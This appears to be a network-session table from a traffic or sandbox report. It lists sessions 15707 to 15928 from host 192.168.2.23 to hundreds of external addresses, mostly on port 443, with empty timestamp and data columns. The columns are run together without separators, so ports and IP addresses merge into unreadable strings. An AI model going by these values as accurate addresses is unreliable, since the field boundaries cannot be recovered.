                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15707192.168.2.234247693.182.10.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15708192.168.2.2347410132.123.120.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15709192.168.2.233578473.204.133.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15710192.168.2.2333978100.136.196.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15711192.168.2.234144466.63.95.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15712192.168.2.2359644172.93.126.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15713192.168.2.2335130152.70.189.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15714192.168.2.2332940199.21.218.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15715192.168.2.234366443.217.26.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15716192.168.2.234393685.102.141.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15717192.168.2.23417205.66.68.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15718192.168.2.2354638110.177.17.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15719192.168.2.2341488197.13.241.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15720192.168.2.2353652176.107.5.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15721192.168.2.2338902182.167.36.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15722192.168.2.2354250193.219.160.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15723192.168.2.2360398166.147.197.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15724192.168.2.233637679.239.13.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15725192.168.2.2333810193.220.26.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15726192.168.2.2352862193.109.152.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15727192.168.2.2334406102.28.198.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15728192.168.2.235524681.35.73.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15729192.168.2.234088413.233.236.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15730192.168.2.2339308147.233.12.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15731192.168.2.2342774207.250.185.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15732192.168.2.235370874.167.223.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15733192.168.2.2356134145.2.95.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15734192.168.2.2334762188.205.158.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15735192.168.2.2354750174.175.191.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15736192.168.2.235021235.61.211.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15737192.168.2.2359488193.255.190.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15738192.168.2.234369225.241.250.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15739192.168.2.23408964.204.254.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15740192.168.2.2351082104.18.225.698080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15741192.168.2.2348966175.120.116.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15742192.168.2.2339756191.83.125.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15743192.168.2.2354008124.192.105.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15744192.168.2.2332980126.71.36.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15745192.168.2.234989623.50.214.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15746192.168.2.2354882169.111.208.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15747192.168.2.2343536144.111.77.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15748192.168.2.233723238.244.155.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15749192.168.2.233928047.4.9.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15750192.168.2.2345896109.200.95.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15751192.168.2.2347946100.204.220.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15752192.168.2.234692487.174.243.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15753192.168.2.234010834.61.177.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15754192.168.2.2337574135.180.246.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15755192.168.2.234978847.74.142.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15756192.168.2.2353850120.143.118.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15757192.168.2.235794852.125.65.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15758192.168.2.234678460.37.93.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15759192.168.2.233876238.3.40.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15760192.168.2.2354076103.45.25.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15761192.168.2.2343968209.202.102.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15762192.168.2.2340756134.38.212.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15763192.168.2.235073076.27.75.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15764192.168.2.235938687.152.54.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15765192.168.2.2340586205.250.222.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15766192.168.2.233458664.131.89.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15767192.168.2.2354032200.91.82.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15768192.168.2.234326476.115.123.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15769192.168.2.2349690115.171.11.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15770192.168.2.2359562173.60.183.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15771192.168.2.2336530194.163.216.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15772192.168.2.234060099.124.88.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15773192.168.2.2346876213.72.182.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15774192.168.2.235879448.207.221.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15775192.168.2.2337462190.4.131.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15776192.168.2.234132213.51.16.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15777192.168.2.2348434175.73.18.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15778192.168.2.23385881.39.37.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15779192.168.2.2349310200.140.175.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15780192.168.2.2340658137.55.3.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15781192.168.2.2353632216.183.3.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15782192.168.2.235157439.54.33.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15783192.168.2.2353646205.111.247.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15784192.168.2.2353946165.233.110.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15785192.168.2.2338984156.136.238.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15786192.168.2.23334729.74.81.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15787192.168.2.234444444.162.222.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15788192.168.2.233527262.194.129.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15789192.168.2.235916831.248.243.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15790192.168.2.2337242143.209.254.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15791192.168.2.2341372124.105.222.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15792192.168.2.2344400185.51.2.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15793192.168.2.234676273.0.133.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15794192.168.2.234851618.252.115.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15795192.168.2.23344449.140.94.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15796192.168.2.234895891.61.179.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15797192.168.2.233614271.140.55.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15798192.168.2.2347744189.240.162.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15799192.168.2.2358486220.140.204.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15800192.168.2.2356858192.79.22.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15801192.168.2.2349256208.249.131.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15802192.168.2.234180453.14.83.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15803192.168.2.233848677.171.134.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15804192.168.2.2335842223.248.158.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15805192.168.2.235948240.86.46.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15806192.168.2.2348774120.17.59.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15807192.168.2.2332956138.96.254.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15808192.168.2.2351882149.111.240.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15809192.168.2.233863279.130.206.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15810192.168.2.2341900160.139.146.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15811192.168.2.234073635.22.110.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15812192.168.2.2335498210.3.200.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15813192.168.2.2356634189.133.7.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15814192.168.2.2346500213.65.168.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15815192.168.2.233946643.41.190.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15816192.168.2.2359852107.111.108.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15817192.168.2.234686831.203.35.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15818192.168.2.2338982168.73.143.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15819192.168.2.235521276.247.160.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15820192.168.2.2355276105.193.137.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15821192.168.2.2348472146.97.128.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15822192.168.2.2339550207.21.54.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15823192.168.2.235491882.142.240.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15824192.168.2.234665412.222.22.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15825192.168.2.234720082.126.137.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15826192.168.2.2333634221.119.131.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15827192.168.2.235802699.40.228.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15828192.168.2.2340972107.134.25.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15829192.168.2.234505677.77.109.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15830192.168.2.234403218.134.102.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15831192.168.2.234722057.76.219.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15832192.168.2.235988289.47.191.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15833192.168.2.234068839.208.84.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15834192.168.2.2353734173.0.183.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15835192.168.2.2335658159.115.22.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15836192.168.2.234558697.237.123.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15837192.168.2.233858276.6.181.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15838192.168.2.233490450.127.30.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15839192.168.2.2339528105.75.145.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15840192.168.2.234747862.217.136.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15841192.168.2.233858296.184.135.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15842192.168.2.2352770121.162.43.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15843192.168.2.234678078.136.71.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15844192.168.2.234129827.161.253.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15845192.168.2.234726885.30.0.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15846192.168.2.2339598110.96.157.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15847192.168.2.2355442190.247.148.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15848192.168.2.2343736130.57.178.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15849192.168.2.2336394132.140.252.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15850192.168.2.233289087.28.106.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15851192.168.2.2344546126.74.252.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15852192.168.2.233458020.192.27.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15853192.168.2.2347866141.79.4.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15854192.168.2.23473585.4.151.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15855192.168.2.235782845.144.169.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15856192.168.2.2334406218.246.19.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15857192.168.2.2337236174.118.208.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15858192.168.2.2355176161.191.39.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15859192.168.2.2354364188.107.235.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15860192.168.2.2345864183.90.145.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15861192.168.2.234384017.45.13.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15862192.168.2.2348350205.26.114.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15863192.168.2.233824675.142.202.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15864192.168.2.2360696119.132.153.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15865192.168.2.2340880198.123.151.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15866192.168.2.233914696.148.172.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15867192.168.2.2337372185.158.237.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15868192.168.2.23522841.46.57.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15869192.168.2.234951072.40.144.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15870192.168.2.233816670.204.127.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15871192.168.2.2349612187.154.67.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15872192.168.2.233540293.246.119.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15873192.168.2.234592018.205.126.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15874192.168.2.2356810114.177.159.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15875192.168.2.23469288.52.209.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15876192.168.2.2347194107.157.184.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15877192.168.2.2336446206.124.119.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15878192.168.2.2353992191.194.182.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15879192.168.2.235959054.161.195.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15880192.168.2.2346302188.233.31.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15881192.168.2.2359712163.113.77.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15882192.168.2.235260832.99.32.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15883192.168.2.2355094124.107.198.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15884192.168.2.2347448135.57.188.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15885192.168.2.2360088131.228.61.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15886192.168.2.233401673.143.215.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15887192.168.2.2347552102.126.56.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15888192.168.2.23569508.153.241.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15889192.168.2.2333494121.76.144.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15890192.168.2.2349600206.204.239.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15891192.168.2.234515663.62.36.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15892192.168.2.233589818.190.130.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15893192.168.2.233554498.50.175.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15894192.168.2.2351044179.126.15.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15895192.168.2.2334768101.137.164.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15896192.168.2.2360522125.37.145.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15897192.168.2.2350358193.49.236.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15898192.168.2.2340084179.214.147.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15899192.168.2.2342938159.70.1.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15900192.168.2.2348654211.72.73.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15901192.168.2.233596464.183.141.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15902192.168.2.2344704164.59.171.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15903192.168.2.234869498.156.233.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15904192.168.2.2340158101.147.238.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15905192.168.2.2349598156.110.18.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15906192.168.2.235393875.23.30.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15907192.168.2.2351510164.37.149.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15908192.168.2.235823048.132.108.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15909192.168.2.233479472.147.15.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15910192.168.2.2360766175.53.25.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15911192.168.2.2336828207.0.179.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15912192.168.2.234026898.216.11.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15913192.168.2.2336368137.106.183.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15914192.168.2.233387447.78.223.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15915192.168.2.2333794186.25.46.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15916192.168.2.235236096.34.17.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15917192.168.2.234984418.170.237.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15918192.168.2.2346818120.161.133.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15919192.168.2.2343722137.149.50.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15920192.168.2.2340324106.206.66.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15921192.168.2.2332786167.235.195.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15922192.168.2.234521048.249.191.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15923192.168.2.2344240200.223.158.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15924192.168.2.234951897.207.212.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15925192.168.2.2358406222.144.51.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15926192.168.2.23453261.249.7.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15927192.168.2.234439041.51.177.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15928192.168.2.2336266190.98.208.91443
